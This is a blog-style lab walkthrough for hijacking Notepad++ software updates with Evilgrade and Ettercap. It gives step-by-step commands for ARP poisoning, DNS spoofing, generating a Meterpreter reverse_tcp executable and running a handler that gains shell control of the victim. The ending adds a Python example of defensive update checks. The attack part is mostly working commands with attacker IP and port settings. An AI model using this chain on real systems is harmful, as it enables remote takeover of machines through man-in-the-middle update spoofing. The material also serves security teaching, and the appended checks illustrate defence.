Sunday, September 2, 2012

Software Update MITM Exploit Using Evilgrade and Ettercap

Many applications check for updates. Sometimes the update is performed over SSL, but commonly updates are delivered over plain HTTP, where they can be manipulated.
Evilgrade is a modular exploit tool that spoofs software update responses and delivers an executable of the attacker's choosing to the victim. In this lab, I used Evilgrade with Ettercap.

Your victim machine uses an unstable Notepad++ version:
1 - Unstable version
2 - Victim IP and DNS
Install Evilgrade on the Backtrack system:
1 - # cd /root
2 - # apt-get install libdata-dump-perl
3 - # wget http://isr-evilgrade.googlecode.com/files/isr-evilgrade-2.0.0.tar.gz
4 - # tar xfz isr-evilgrade-2.0.0.tar.gz
5 - # cd isr-evilgrade
Prepare the Meterpreter executable to deliver to the victim
1 - # ifconfig eth0
Get your Backtrack IP address
2 - # cd /root/isr-evilgrade/agent/
Go to the Evilgrade agent directory
3 - # /opt/metasploit/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.174.132 LPORT=8080 X > agent.exe
Create the Meterpreter executable
4 - # ls
Verify that agent.exe was created

1 - # /opt/metasploit/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=8080 LHOST=0.0.0.0 E
Start the Meterpreter handler to accept the reverse TCP connection
2 - Leave this command running while we continue the lab

1 - # echo "notepad-plus.sourceforge.net A 192.168.174.132" >> /usr/local/share/ettercap/etter.dns
Add an entry to etter.dns so that notepad-plus.sourceforge.net resolves to the Backtrack IP
2 - # echo "download.tuxfamily.org A 192.168.174.132" >> /usr/local/share/ettercap/etter.dns
Add an entry to etter.dns so that download.tuxfamily.org resolves to the Backtrack IP
3 - # gedit /usr/local/share/ettercap/etter.dns
Check your config

Launch Ettercap with the ARP MITM attack
1 - # ettercap -Tqm arp:remote /192.168.174.150/ /8.8.8.8,4/
2 - Press "p" to choose a plugin
3 - Invoke the dns_spoof Ettercap plugin
4 - Test on the victim system

Invoke the Evilgrade Notepad++ module
1 - # cd /root/isr-evilgrade
2 - # ./evilgrade
3 - evilgrade> conf notepadplus
4 - evilgrade(notepadplus)> start

Note: If your Notepad++ version is higher than 5.8, you must edit the Notepad++ module config file:
1 - # gedit /root/isr-evilgrade/modules/notepadplus.pm
2 - Change 'vh' => 'notepad-plus.sourceforge.net' to 'vh' => 'download.tuxfamily.org'

On the victim system
1 - Run Notepad++, click ? | Update Notepad++
2 - After downloading the update executable, Notepad++ will prompt the user to install the update; click "Yes"

Return to Meterpreter on the Backtrack system
From here you have control over the victim system; try entering Meterpreter commands:
1 - sysinfo
2 - shell
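The chain above works because the client accepts whatever executable arrives at a plain-HTTP update location. The following is an added example (not part of the original post, and not Notepad++ or Evilgrade code) of the checks a hardened updater applies before running a downloaded update: refuse non-HTTPS locations, refuse unexpected hosts, and compare the payload against a pinned SHA-256. The host list, the "genuine" package bytes and the pinned digest are constructed for the example.

```python
import hashlib
from urllib.parse import urlparse

# Hosts the updater is allowed to fetch from (assumed for this example).
ALLOWED_HOSTS = {"notepad-plus.sourceforge.net", "download.tuxfamily.org"}

# Constructed stand-in for the genuine update package. In a real client the
# digest comes from a signed manifest verified with a key shipped in the
# application, never from the same unauthenticated channel as the payload.
GENUINE_UPDATE = b"constructed genuine update package bytes"
PINNED_SHA256 = hashlib.sha256(GENUINE_UPDATE).hexdigest()


def check_update(location, payload, pinned_sha256=PINNED_SHA256,
                 allowed_hosts=ALLOWED_HOSTS):
    """Return (ok, reason); ok is True only when every check passes."""
    url = urlparse(location)
    # 1. A plain-HTTP location is what the DNS-spoof chain relies on. The
    #    scheme check only ensures TLS is in play; it is the certificate
    #    validation done by the HTTPS client that actually defeats a
    #    spoofed A record, because the attacker's host cannot present a
    #    valid certificate for the vendor's name.
    if url.scheme != "https":
        return False, f"update location is not https: {location}"
    # 2. Even over HTTPS, only the vendor's own hosts are acceptable, so a
    #    rewritten update response cannot redirect to an arbitrary server.
    if url.hostname not in allowed_hosts:
        return False, f"unexpected update host: {url.hostname}"
    # 3. The downloaded bytes must match the pinned digest, so a swapped
    #    executable (such as agent.exe) is rejected even if 1 and 2 pass.
    digest = hashlib.sha256(payload).hexdigest()
    if digest != pinned_sha256:
        return False, f"digest mismatch: got {digest}"
    return True, "update verified"


if __name__ == "__main__":
    # Constructed spoofed response: plain HTTP, attacker-supplied payload.
    print(check_update("http://download.tuxfamily.org/npp.exe",
                       b"constructed attacker payload"))
    print(check_update("https://download.tuxfamily.org/npp.exe",
                       GENUINE_UPDATE))
```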

------------------------------------------------------------
Thanks for reading